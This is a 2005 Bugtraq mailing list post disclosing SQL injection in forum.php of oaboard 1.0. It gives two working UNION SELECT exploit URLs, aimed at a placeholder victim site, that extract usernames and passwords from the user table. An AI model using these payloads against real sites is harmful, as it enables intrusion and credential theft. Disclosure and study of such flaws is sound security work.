Bugtraq mailing list archives
SQL IN FORUM.PHP
From: ABDUCTER_MINDS () YAHOO COM
Date: 30 Oct 2005 12:03:59 -0000
Class: Input Validation Error CVE: CVE-MAP-NOMATCH Remote: Yes Discovered BY ABDUCTER & Expliot BY DEVIL-00 ABDUCTER_MINDS () S4A CC (OR) ABDUCTER_MINDS () YAHOO COM Vulnerable:powered by oaboard 1.0 ////////////////////////////////// info:- FOR INFORMATION VISIT http://oaboard.myserver.at/oaboard/forum.php ///////////////////////////////// discussion: THERE IS SQL IN FORUM.PHP ********************************* EXPLIOTS AND EXAMPLE -------------------- //-------1---------// http://WWW.VICTIM.COM/oaboard/forum.php?modul=topics&channel=[SQL] http://WWW.VICTIM.COM/oaboard/forum.php?modul=topics&channel=-99%20UNION%20SELECT%20null,password%20FROM%20pw99_user%20WHERE%20id=1 //-------2--------// http://WWW.VICTIM.COM/oaboard/forum.php?modul=posting&topic=[SQL]&channel=3 http://oWWW.VICTIM.COM/oaboard/forum.php?modul=posting&topic=30%20UNION%20SELECT%20null,username,null,password%20FROM%20pw99_user%20WHERE%20id=1/*&channel=3 ********************************* CREDITS S4A.CC FOR ALL GEEKS FOR AL ARAB HACKER PAL MY LOVE (N0N0)
Current thread:
- SQL IN FORUM.PHP ABDUCTER_MINDS (Oct 31)